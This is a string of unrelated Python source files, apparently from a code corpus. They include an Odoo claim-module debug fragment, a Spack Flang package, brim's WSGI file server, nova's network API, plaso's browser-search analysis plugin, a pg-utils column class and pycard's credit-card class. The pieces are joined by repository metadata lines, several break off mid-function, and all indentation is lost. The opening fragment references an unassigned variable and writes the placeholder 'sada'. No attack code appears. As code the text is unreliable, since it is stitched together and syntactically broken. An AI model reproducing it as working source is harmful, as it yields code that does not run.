@api.depends('invoice_line_text','invoice_line')
def _get_text_lines(self):
_logger.info("filoquin ----- self : %r", self)
for record in self:
record.invoice_line_text ='sada'
def prueba(self, cr, uid,ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
_logger.info("filoquin ----- context : %r", context)
def _get_default_warehouse(self, cr, uid, context=None):
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
company_id = user.company_id.id
wh_obj = self.pool.get('stock.warehouse')
wh_ids = wh_obj.search(cr, uid,
[('company_id', '=', company_id)],
context=context)
if not wh_ids:
raise orm.except_orm(
_('Error!'),
_('There is no warehouse for the current user\'s company.'))
return wh_ids[0]
def create(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- create : %r", vals)
#newclaim=self.newclaim( cr, uid, [vals['invoice_id']], context=None)
_logger.info("filoquin ----- newclaim : %r", newclaim)
pass
def write(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- write : %r", vals)
pass
def newclaim(self, cr, uid, ids, context=None):
res_invoice_id = ids[0]
claims = self.pool.get('crm.claim').search(cr,uid,
[('invoice_id', '=', res_invoice_id)],
context=context)
if claims :
return
krafczyk/spack | var/spack/repos/builtin/packages/flang/package.py | Python | lgpl-2.1 | 3,969 | 0.000756
##############################################################################
# Copyright (c) 2017, Los Alamos National Security, LLC
# Produced at the Los Alamos National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import os
class Flang(CMakePackage):
"""Flang is a Fortran compiler targeting LLVM."""
homepage = "https://github.com/flang-compiler/flang"
url = "https://github.com/flang-compiler/flang/archive/flang_20180612.tar.gz"
git = "https://github.com/flang-compiler/flang.git"
version('develop', branch='master')
version('20180612', '62284e26214eaaff261a922c67f6878c')
depends_on('llvm@flang-develop', when='@develop')
depends_on('llvm@flang-20180612', when='@20180612 target=x86_64')
# LLVM version specific to OpenPOWER.
depends_on('llvm@flang-ppc64le-20180612', when='@20180612 target=ppc64le')
depends_on('pgmath@develop', when='@develop')
depends_on('pgmath@20180612', when='@20180612')
def cmake_args(self):
options = [
'-DWITH_WERROR=OFF',
'-DCMAKE_C_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'clang'),
'-DCMAKE_CXX_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'clang++'),
'-DCMAKE_Fortran_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'flang'),
'-DFLANG_LIBOMP=%s' % find_libraries(
'libomp', root=self.spec['llvm'].prefix.lib)
]
return options
@run_after('install')
def post_install(self):
# we are installing flang in a path different from llvm, so we
# create a wrapper with -L for e.g. libflangrti.so and -I for
# e.g. iso_c_binding.mod. -B is needed to help flang to find
# flang1 and flang2. rpath_arg is needed so that executables
# generated by flang can find libflang later.
flang = os.path.join(self.spec.prefix.bin, 'flang')
with open(flang, 'w') as out:
out.write('#!/bin/bash\n')
out.write(
'{0} -I{1} -L{2} -L{3} {4}{5} {6}{7} -B{8} "$@"\n'.format(
self.spec['llvm'].prefix.bin.flang,
self.prefix.include, self.prefix.lib,
self.spec['pgmath'].prefix.lib,
self.compiler.fc_rpath_arg, self.prefix.lib,
self.compiler.fc_rpath_arg,
self.spec['pgmath'].prefix.lib, self.spec.prefix.bin))
out.close()
chmod = which('chmod')
chmod('+x', flang)
def setup_environment(self, spack_env, run_env):
# to find llvm's libc++.so
spack_env.set('LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib)
run_env.set('FC', join_path(self.spec.prefix.bin, 'flang'))
run_env.set('F77', join_path(self.spec.prefix.bin, 'flang'))
run_env.set('F90', join_path(self.spec.prefix.bin, 'flang'))
gholt/python-brim | brim/wsgi_fs.py | Python | apache-2.0 | 9,657 | 0.000518
"""A WSGI application that simply serves up files from the file system.
.. warning::
This is an early version of this module. It has no tests, limited
documentation, and is subject to major changes.
Configuration Options::
[wsgi_fs]
call = brim.wsgi_fs.WSGIFS
# path = <path>
# The request path to match and serve; any paths that do not begin
# with this value will be passed on to the next WSGI app in the
# chain. Default: /
# serve_path = <path>
# The local file path containing files to serve.
"""
"""Copyright and License.
Copyright 2014 Gregory Holt
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import mimetypes
import os
import time
from cgi import escape
from brim import http
MONTH_ABR = (
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct',
'Nov', 'Dec')
WEEKDAY_ABR = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')
def http_date_time(when):
"""Returns a date and time formatted as per HTTP RFC 2616."""
gmtime = time.gmtime(when)
return '%s, %02d %3s %4d %02d:%02d:%02d GMT' % (
WEEKDAY_ABR[gmtime.tm_wday], gmtime.tm_mday,
MONTH_ABR[gmtime.tm_mon - 1], gmtime.tm_year, gmtime.tm_hour,
gmtime.tm_min, gmtime.tm_sec)
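# Example (illustrative): http_date_time(0) -> 'Thu, 01 Jan 1970 00:00:00 GMT'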
def _openiter(path, chunk_size, total_size):
left = total_size
with open(path, 'rb') as source:
while True:
chunk = source.read(min(chunk_size, left))
if not chunk:
break
left -= len(chunk)
yield chunk
if left >= chunk_size:
chunk = ' ' * chunk_size
while left >= chunk_size:
left -= chunk_size
yield chunk
if left:
yield ' ' * left
class WSGIFS(object):
"""A WSGI app for serving up files from the file system.
See :py:mod:`brim.wsgi_fs` for more information.
:param name: The name of the app.
:param parsed_conf: The conf result from :py:meth:`parse_conf`.
:param next_app: The next WSGI app in the chain.
"""
def __init__(self, name, parsed_conf, next_app):
self.name = name
"""The name of the app."""
self.next_app = next_app
"""The next WSGI app in the chain."""
self.path = parsed_conf['path']
"""The request path to match and serve.
Any paths that do not begin with this value will be passed on to
the next WSGI app in the chain. The attribute will have leading
and trailing forward slashes removed.
"""
self.serve_path = parsed_conf['serve_path']
"""The local file path containing files to serve."""
def __call__(self, env, start_response):
"""Handles incoming WSGI requests.
Requests that start with the configured path simply serve up any
files under the configured location on the file system. Other
requests are passed on to the next WSGI app in the chain.
:param env: The WSGI env as per the spec.
:param start_response: The WSGI start_response as per the spec.
:returns: Calls *start_response* and returns an iterable as per
the WSGI spec.
"""
path = os.path.normpath(env['PATH_INFO'].strip('/'))
if path == self.path:
path = '.'
elif path.startswith(self.path + '/'):
path = path[len(self.path) + 1:]
if not path:
path = '.'
elif self.path:
return self.next_app(env, start_response)
if path == '..' or path.startswith('..' + os.path.sep):
return http.HTTPForbidden()(env, start_response)
path = os.path.join(self.serve_path, path)
if not os.path.exists(path):
return http.HTTPNotFound()(env, start_response)
if os.path.isdir(path):
if not env['PATH_INFO'].endswith('/'):
return http.HTTPMovedPermanently(
headers={'Location': env['PATH_INFO'] + '/'})(
env, start_response)
dirpath = path
path = os.path.join(path, 'index.html')
if not os.path.exists(path):
return self.listing(dirpath, env, start_response)
content_type = mimetypes.guess_type(path)[0] or \
'application/octet-stream'
stat = os.stat(path)
if not stat.st_size:
start_response(
'204 No Content',
[('Content-Length', '0'), ('Content-Type', content_type)])
start_response(
'200 OK',
[('Content-Length', str(stat.st_size)),
('Content-Type', content_type),
('Last-Modified',
http_date_time(min(stat.st_mtime, time.time())))])
if env['REQUEST_METHOD'] == 'HEAD':
return ''
return _openiter(path, 65536, stat.st_size)
def listing(self, path, env, start_response):
if not path.startswith(self.serve_path + '/'):
return http.HTTPForbidden()(env, start_response)
rpath = '/' + self.path + '/' + path[len(self.serve_path) + 1:]
epath = escape(rpath)
body = (
'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 '
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n'
'<html>\n'
' <head>\n'
' <title>Listing of %s</title>\n'
' <style type="text/css">\n'
' h1 {font-size: 1em; font-weight: bold;}\n'
' th {text-align: left; padding: 0px 1em 0px 1em;}\n'
' td {padding: 0px 1em 0px 1em;}\n'
' a {text-decoration: none;}\n'
' .colsize {text-align: right;}\n'
' </style>\n'
' </head>\n'
' <body>\n'
' <h1 id="title">Listing of %s</h1>\n'
' <table id="listing">\n'
' <tr id="heading">\n'
' <th class="colname">Name</th>\n'
' <th class="colsize">Size</th>\n'
' <th class="coldate">Date</th>\n'
' </tr>\n' % (epath, epath))
if env['PATH_INFO'].count('/') > 1:
body += (
' <tr id="parent" class="item">\n'
' <td class="colname"><a href="../">../</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n')
listing = sorted(os.listdir(path))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isdir(itempath):
body += (
' <tr class="item subdir">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n' % (http.quote(item), escape(item)))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isfile(itempath):
ext = os.path.splitext(item)[1].lstrip('.')
size = os.path.getsize(itempath)
mtime = os.path.getmtime(itempath)
body += (
' <tr class="item %s">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize">'
'<script type="text/javascript">'
'document.write(new Number(%s).toLocaleString());'
'</script></td>\n'
' <td class="coldate">'
'<script type="text/javascript">'
'document.write(new Date(%s * 1000).toLo
vmthunder/nova | nova/network/api.py | Python | apache-2.0 | 23,489 | 0.000341
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo.config import cfg
from nova.compute import flavors
from nova import exception
from nova.i18n import _
from nova.network import base_api
from nova.network import floating_ips
from nova.network import model as network_model
from nova.network import rpcapi as network_rpcapi
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import log as logging
from nova import policy
from nova import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def wrap_check_policy(func):
"""Check policy corresponding to the wrapped methods prior to execution."""
@functools.wraps(func)
def wrapped(self, context, *args, **kwargs):
action = func.__name__
check_policy(context, action)
return func(self, context, *args, **kwargs)
return wrapped
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'network:%s' % action
policy.enforce(context, _action, target)
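# Example (illustrative): a call like API().get_all(context) first runs
# check_policy(context, "get_all"), enforcing the policy rule named
# "network:get_all" against the caller's project_id/user_id before the
# decorated method body executes.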
class API(base_api.NetworkAPI):
"""API for doing networking via the nova-network network manager.
This is a pluggable module - other implementations do networking via
other services (such as Neutron).
"""
def __init__(self, **kwargs):
self.network_rpcapi = network_rpcapi.NetworkAPI()
helper = utils.ExceptionHelper
# NOTE(vish): this local version of floating_manager has to convert
# ClientExceptions back since they aren't going over rpc.
self.floating_manager = helper(floating_ips.LocalManager())
super(API, self).__init__(**kwargs)
@wrap_check_policy
def get_all(self, context):
"""Get all the networks.
If it is an admin user then api will return all the
networks. If it is a normal user and nova Flat or FlatDHCP
networking is being used then api will return all
networks. Otherwise api will only return the networks which
belong to the user's project.
"""
if "nova.network.manager.Flat" in CONF.network_manager:
project_only = "allow_none"
else:
project_only = True
try:
return objects.NetworkList.get_all(context,
project_only=project_only)
except exception.NoNetworksFound:
return []
@wrap_check_policy
def get(self, context, network_uuid):
return objects.Network.get_by_uuid(context.elevated(), network_uuid)
@wrap_check_policy
def create(self, context, **kwargs):
return self.network_rpcapi.create_networks(context, **kwargs)
@wrap_check_policy
def delete(self, context, network_uuid):
return self.network_rpcapi.delete_network(context, network_uuid, None)
@wrap_check_policy
def disassociate(self, context, network_uuid):
network = self.get(context, network_uuid)
objects.Network.disassociate(context, network.id,
host=True, project=True)
@wrap_check_policy
def get_fixed_ip(self, context, id):
return objects.FixedIP.get_by_id(context, id)
@wrap_check_policy
def get_fixed_ip_by_address(self, context, address):
return objects.FixedIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ip(self, context, id):
if not utils.is_int_like(id):
raise exception.InvalidID(id=id)
return objects.FloatingIP.get_by_id(context, id)
@wrap_check_policy
def get_floating_ip_pools(self, context):
return objects.FloatingIP.get_pool_names(context)
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
return objects.FloatingIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ips_by_project(self, context):
return objects.FloatingIPList.get_by_project(context,
context.project_id)
@wrap_check_policy
def get_floating_ips_by_fixed_address(self, context, fixed_address):
floating_ips = objects.FloatingIPList.get_by_fixed_address(
context, fixed_address)
return [str(floating_ip.address) for floating_ip in floating_ips]
@wrap_check_policy
def get_instance_id_by_floating_address(self, context, address):
fixed_ip = objects.FixedIP.get_by_floating_address(context, address)
if fixed_ip is None:
return None
else:
return fixed_ip.instance_uuid
@wrap_check_policy
def get_vifs_by_instance(self, context, instance):
vifs = objects.VirtualInterfaceList.get_by_instance_uuid(context,
instance.uuid)
for vif in vifs:
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vifs
@wrap_check_policy
def get_vif_by_mac_address(self, context, mac_address):
vif = objects.VirtualInterface.get_by_address(context,
mac_address)
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vif
@wrap_check_policy
def allocate_floating_ip(self, context, pool=None):
"""Adds (allocates) a floating ip to a project from a pool."""
return self.floating_manager.allocate_floating_ip(context,
context.project_id, False, pool)
@wrap_check_policy
def release_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Removes (deallocates) a floating ip with address from a project."""
return self.floating_manager.deallocate_floating_ip(context, address,
affect_auto_assigned)
def disassociate_and_release_floating_ip(self, context, instance,
floating_ip):
"""Removes (deallocates) and deletes the floating ip.
This api call was added to allow this to be done in one operation
if using neutron.
"""
address = floating_ip['address']
if floating_ip.get('fixed_ip_id'):
try:
self.disassociate_floating_ip(context, instance, address)
except exception.FloatingIpNotAssociated:
msg = ("Floating ip %s has already been disassociated, "
"perhaps by another concurrent action.") % address
LOG.debug(msg)
# release ip from project
return self.release_floating_ip(context, address)
@wrap_check_policy
@base_api.refresh_cache
def associate_floating_ip(self, context, instance,
floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip.
Ensures floating ip is allocated to the project in context.
|
iwm911/plaso
|
plaso/analysis/browser_search.py
|
Python
|
apache-2.0
| 6,727
| 0.008771
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A plugin that extracts browser history from events."""
import collections
import logging
import urllib
from plaso import filters
from plaso.analysis import interface
from plaso.lib import event
from plaso.lib import eventdata
def ScrubLine(line):
"""Scrub the line of most obvious HTML codes.
An attempt at taking a line and swapping all instances
of %XX which represent a character in hex with its
unicode character.
Args:
line: The string that we are about to "fix".
Returns:
String that has its %XX hex codes swapped for text.
"""
if not line:
return ''
try:
return unicode(urllib.unquote(str(line)), 'utf-8')
except UnicodeDecodeError:
logging.warning(u'Unable to decode line: {0:s}'.format(line))
return line
class FilterClass(object):
"""A class that contains all the parser functions."""
@classmethod
def _GetBetweenQEqualsAndAmbersand(cls, string):
"""Return back string that is defined 'q=' and '&'."""
if 'q=' not in string:
return string
_, _, line = string.partition('q=')
before_and, _, _ = line.partition('&')
if not before_and:
return line
return before_and.split()[0]
@classmethod
def _SearchAndQInLine(cls, string):
"""Return a bool indicating if the words q= a
|
nd search appear in string."""
return 'search' in string and 'q=' in string
@classmethod
def GoogleSearch(cls, url):
"""Return back the extracted string."""
if not cls._SearchAndQInLine(url):
return
line = cls._GetBetweenQEqualsAndAmbersand(url)
if not line:
return
return line.replace('+', ' ')
@classmethod
def YouTube(cls, url):
"""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def BingSearch(cls, url):
"
|
""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def GenericSearch(cls, url):
"""Return back the extracted string from a generic search engine."""
if not cls._SearchAndQInLine(url):
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Yandex(cls, url):
"""Return back the results from Yandex search engine."""
if 'text=' not in url:
return
_, _, line = url.partition('text=')
before_and, _, _ = line.partition('&')
if not before_and:
return
yandex_search_url = before_and.split()[0]
return yandex_search_url.replace('+', ' ')
@classmethod
def DuckDuckGo(cls, url):
"""Return back the extracted string."""
if not 'q=' in url:
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Gmail(cls, url):
"""Return back the extracted string."""
if 'search/' not in url:
return
_, _, line = url.partition('search/')
first, _, _ = line.partition('/')
second, _, _ = first.partition('?compose')
return second.replace('+', ' ')
class AnalyzeBrowserSearchPlugin(interface.AnalysisPlugin):
"""Analyze browser search entries from events."""
NAME = 'browser_search'
# Indicate that we do not want to run this plugin during regular extraction.
ENABLE_IN_EXTRACTION = False
# Here we define filters and callback methods for all hits on each filter.
FILTERS = (
(('url iregexp "(www.|encrypted.|/)google." and url contains "search"'),
'GoogleSearch'),
('url contains "youtube.com"', 'YouTube'),
(('source is "WEBHIST" and url contains "bing.com" and url contains '
'"search"'), 'BingSearch'),
('url contains "mail.google.com"', 'Gmail'),
(('source is "WEBHIST" and url contains "yandex.com" and url contains '
'"yandsearch"'), 'Yandex'),
('url contains "duckduckgo.com"', 'DuckDuckGo')
)
def __init__(self, pre_obj, incoming_queue, outgoing_queue):
"""Constructor for the browser history plugin."""
super(AnalyzeBrowserSearchPlugin, self).__init__(
pre_obj, incoming_queue, outgoing_queue)
self._filter_dict = {}
self._counter = collections.Counter()
for filter_str, call_back in self.FILTERS:
filter_obj = filters.GetFilter(filter_str)
call_back_obj = getattr(FilterClass, call_back, None)
if filter_obj and call_back_obj:
self._filter_dict[filter_obj] = (call_back, call_back_obj)
def ExamineEvent(self, event_object):
"""Take an EventObject and send it through analysis."""
# This event requires an URL attribute.
url_attribute = getattr(event_object, 'url', None)
if not url_attribute:
return
# Check if we are dealing with a web history event.
source, _ = eventdata.EventFormatterManager.GetSourceStrings(event_object)
if source != 'WEBHIST':
return
for filter_obj, call_backs in self._filter_dict.items():
call_back_name, call_back_object = call_backs
if filter_obj.Match(event_object):
returned_line = ScrubLine(call_back_object(url_attribute))
if not returned_line:
continue
self._counter[u'{}:{}'.format(call_back_name, returned_line)] += 1
def CompileReport(self):
"""Compiles a report of the analysis.
Returns:
The analysis report (instance of AnalysisReport).
"""
report = event.AnalysisReport()
results = {}
for key, count in self._counter.iteritems():
search_engine, _, search_term = key.partition(':')
results.setdefault(search_engine, {})
results[search_engine][search_term] = count
report.report_dict = results
lines_of_text = []
for search_engine, terms in sorted(results.items()):
lines_of_text.append(u' == ENGINE: {0:s} =='.format(search_engine))
for search_term, count in sorted(
terms.iteritems(), key=lambda x: (x[1], x[0]), reverse=True):
lines_of_text.append(u'{0:d} {1:s}'.format(count, search_term))
# An empty string is added to have SetText create an empty line.
lines_of_text.append(u'')
report.SetText(lines_of_text)
return report
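# Illustrative only; not part of the plaso source. A quick stand-alone check of
# the query-extraction helpers above, using a made-up URL.
if __name__ == '__main__':
    sample_url = 'https://www.google.com/search?q=forensic+timeline&hl=en'
    # GoogleSearch() pulls the text between 'q=' and '&' and swaps '+' for spaces.
    assert FilterClass.GoogleSearch(sample_url) == 'forensic timeline'
    # DuckDuckGo() relies on the same 'q=' extraction.
    assert FilterClass.DuckDuckGo('https://duckduckgo.com/?q=plaso+timeline') == 'plaso timeline'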
|
jackmaney/pg-utils
|
pg_utils/column/base.py
|
Python
|
mit
| 10,187
| 0.002945
|
import numpy as np
import pandas as pd
from lazy_property import LazyProperty
from . import _describe_template
from .plot import Plotter
from .. import bin_counts
from .. import numeric_datatypes, _pretty_print
from ..util import seaborn_required
class Column(object):
"""
In Pandas, a column of a DataFrame is represented as a Series.
Similarly, a column in a database table is represented by
an object from this class.
Note that the Series represented by these columns have the default index (ie non-negative, consecutive integers starting at zero). Thus, for the portion of the Pandas Series API mocked here, we need not worry about multilevel (hierarchical) indices.
"""
def __init__(self, name, parent_table):
"""
:param str name: The name of the column. Required.
:param pg_utils.table.Table parent_table: The table to which this column belongs. Required.
"""
self.parent_table = parent_table
self.name = name
self.is_numeric = parent_table._all_column_data_types[name] in numeric_datatypes
self.plot = Plotter(self)
def select_all_query(self):
"""
Provides the SQL used when selecting everything from this column.
:return: The SQL statement.
:rtype: str
"""
return "select {} from {}".format(self, self.parent_table)
def sort_values(self, ascending=True, limit=None, **sql_kwargs):
"""
Mimics the method `pandas.Series.sort_values <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.Series.sort_values.html#pandas.Series.sort_values>`_.
:param int|None limit: Either a positive integer for the number of rows to take or ``None`` to take all.
:param bool ascending: Sort ascending vs descending.
:param dict sql_kwargs: A dictionary of keyword arguments passed into `pandas.read_sql <http://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_sql.html>`_.
:return: The resulting series.
:rtype: pandas.Series
"""
if limit is not None and (not isinstance(limit, int) or limit <= 0):
raise ValueError("limit must be a positive integer or None (got {})".format(limit))
sql = self.select_all_query() + " order by 1"
if not ascending:
sql += " desc"
if limit is not None:
sql += " limit {}".format(limit)
return pd.read_sql(sql, self.parent_table.conn, **sql_kwargs)[self.name]
def unique(self):
"""
Returns an array of unique values in this column. Includes ``null`` (represented as ``None``).
:return: The unique values.
:rtype: np.array
"""
cur = self.parent_table.conn.cursor()
cur.execute("select distinct {} from {}".format(self, self.parent_table))
return np.array([x[0] for x in cur.fetchall()])
def hist(self, **kwargs):
return self.plot.hist(**kwargs)
def head(self, num_rows=10):
"""
Fetches some values of this column.
:param int|str num_rows: Either a positive integer number of values or the string `"all"` to fetch all values
:return: A NumPy array of the values
:rtype: np.array
"""
        if num_rows != "all" and not (isinstance(num_rows, int) and num_rows > 0):
raise ValueError("num_rows must be a positive integer or the string 'all'")
query = self.select_all_query()
if num_rows != "all":
query += " limit {}".format(num_rows)
cur = self.parent_table.conn.cursor()
cur.execute(query)
return np.array([x[0] for x in cur.fetchall()])
@LazyProperty
def is_unique(self):
"""
Determines whether or not the values of this column are all unique (ie whether this column is a unique identifier for the table).
:return: Whether or not this column contains unique values.
:rtype: bool
"""
cur = self.parent_table.conn.cursor()
cur.execute("""select {}
from {}
group by 1 having count(1) > 1""".format(self, self.parent_table))
return cur.fetchone() is None
@LazyProperty
def dtype(self):
"""
The ``dtype`` of this column (represented as a string).
:return: The ``dtype``.
:rtype: str
"""
return self.parent_table._all_column_data_types[self.name]
def _get_describe_query(self, percentiles=None, type_="continuous"):
if type_.lower() not in ["continuous", "discrete"]:
raise ValueError("The 'type_' parameter must be 'continuous' or 'discrete'")
if not self.is_numeric:
return None
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
elif not bool(percentiles):
percentiles = []
if not isinstance(percentiles, (list, tuple)):
percentiles = [percentiles]
if any([x < 0 or x > 1 for x in percentiles]):
raise ValueError(
"The `percentiles` attribute must be None or consist of numbers between 0 and 1 (got {})".format(
percentiles))
percentiles = sorted([float("{0:.2f}".format(p)) for p in percentiles if p > 0])
suffix = "cont" if type_.lower() == "continuous" else "desc"
query = _describe_template.render(column=self, percentiles=percentiles,
suffix=suffix, table=self.parent_table)
if self.parent_table.debug:
_pretty_print(query)
return query
def describe(self, percentiles=None, type_="continuous"):
"""
This mocks the method `pandas.Series.describe`, and provides
a series with the same data (just calculated by the database).
:param None|list[float] percentiles: A list of percentiles to evaluate (with numbers between 0 and 1). If not specified, quartiles (0.25, 0.5, 0.75) are used.
:param str type_: Specifies whether the percentiles are to be taken as discrete or continuous. Must be one of `"discrete"` or `"continuous"`.
:return: A series returning the description of the column, in the same format as ``pandas.Series.describe``.
:rtype: pandas.Series
"""
if percentiles is None:
percentiles = [0.25, 0.5, 0.75]
cur = self.parent_table.conn.cursor()
cur.execute(self._get_describe_query(percentiles=percentiles, type_=type_))
index = ["count", "mean", "std_dev", "minimum"] + \
["{}%".format(int(100 * p)) for p in percentiles] + \
["maximum"]
return pd.Series(cur.fetchone()[1:], index=index)
@seaborn_required
def distplot(self, bins=None, **kwargs):
"""
Produces a ``distplot``. See `the seaborn docs <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_ on ``distplot`` for more information.
Note that this requires Seaborn in order to function.
:param int|None bins: The number of bins to use. If unspecified, the `Freedman-Diaconis rule <https://en.wikipedia.org/wiki/Freedman%E2%80%93Diaconis_rule>`_ will be used to determine the number of bins.
:param dict kwargs: A dictionary of options to pass on to `seaborn.distplot <http://stanford.edu/~mwaskom/software/seaborn/generated/seaborn.distplot.html>`_.
"""
import seaborn
bc = bin_counts.counts(self, bins=bins)
n = sum([entry[2] for entry in bc])
left = np.zeros(n)
right = np.zeros(n)
overall_index = 0
for entry in bc:
for i in range(entry[2]):
|
left[overall_index] = entry[0]
right[overall_index] = entry[1]
|
overall_index += 1
# We'll take our overall data points to be in the midpoint
# of each binning interval
# TODO: make this more configurable (left, right, etc)
return seaborn.distplot((left + right) / 2.0, **kwargs)
@LazyProperty
def values(self):
"""
Mocks the method `pandas.Series.
|
orokusaki/pycard
|
pycard/card.py
|
Python
|
mit
| 7,293
| 0
|
import re
from calendar import monthrange
import datetime
class Card(object):
"""
A credit card that may be valid or invalid.
"""
# A regexp for matching non-digit values
non_digit_regexp = re.compile(r'\D')
# A mapping from common credit card brands to their number regexps
BRAND_VISA = 'visa'
BRAND_MASTERCARD = 'mastercard'
BRAND_AMEX = 'amex'
BRAND_DISCOVER = 'discover'
BRAND_DANKORT = 'dankort'
BRAND_MAESTRO = 'maestro'
BRAND_DINERS = 'diners'
BRAND_UNKNOWN = u'unknown'
BRANDS = {
BRAND_VISA: re.compile(r'^4\d{12}(\d{3})?$'),
BRAND_MASTERCARD: re.compile(r'''
^(5[1-5]\d{4}|677189)\d{10}$| # Traditional 5-series + RU support
^(222[1-9]|2[3-6]\d{2}|27[0-1]\d|2720)\d{12}$ # 2016 2-series
''', re.VERBOSE),
BRAND_AMEX: re.compile(r'^3[47]\d{13}$'),
BRAND_DISCOVER: re.compile(r'^(6011|65\d{2})\d{12}$'),
BRAND_DANKORT: re.compile(r'^(5019)\d{12}$'),
BRAND_MAESTRO:
re.compile(r'^(?:5[0678]\d\d|6304|6390|67\d\d)\d{8,15}$'),
BRAND_DINERS:
re.compile(r'^3(?:0[0-5]|[68][0-9])[0-9]{11}$'),
}
FRIENDLY_BRANDS = {
BRAND_VISA: 'Visa',
BRAND_MASTERCARD: 'MasterCard',
BRAND_AMEX: 'American Express',
BRAND_DISCOVER: 'Discover',
BRAND_DANKORT: 'Dankort',
BRAND_MAESTRO: 'Maestro',
BRAND_DINERS: 'Diners Club',
}
# Common test credit cards
TESTS = (
'4444333322221111',
'378282246310005',
'371449635398431',
'378734493671000',
'30569309025904',
'38520000023237',
'6011111111111117',
'6011000990139424',
'5555555555554444',
'5105105105105100',
'4111111111111111',
'4012888888881881',
'4222222222222',
)
# Stripe test credit cards
TESTS += (
'4242424242424242',
)
def __init__(self, number, month, year, cvc, holder=None):
"""
Attaches the provided card data and holder to the card after removing
non-digits from the provided number.
"""
self.number = self.non_digit_regexp.sub('', number)
self.exp_date = ExpDate(month, year)
self.cvc = cvc
self.holder = holder
def __repr__(self):
"""
Returns a typical repr with a simple representation of the masked card
number and the exp date.
"""
return u'<Card brand={b} number={n}, exp_date={e}>'.format(
b=self.brand,
n=self.mask,
e=self.exp_date.mmyyyy
)
@property
def mask(self):
"""
        Returns the credit card number with all but the last four digits
        replaced by an X, formatted the way they appear on their respective
        brands' cards.
"""
# If the card is invalid, return an "invalid" message
if not self.is_mod10_valid:
return u'invalid'
# If the card is an Amex, it will have special formatting
if self.brand == self.BRAND_AMEX:
return u'XXXX-XXXXXX-X{e}'.format(e=self.number[11:15])
# All other cards
return u'XXXX-XXXX-XXXX-{e}'.format(e=self.number[12:16])
@property
def brand(self):
"""
Returns the brand of the card, if applicable, else an "unknown" brand.
"""
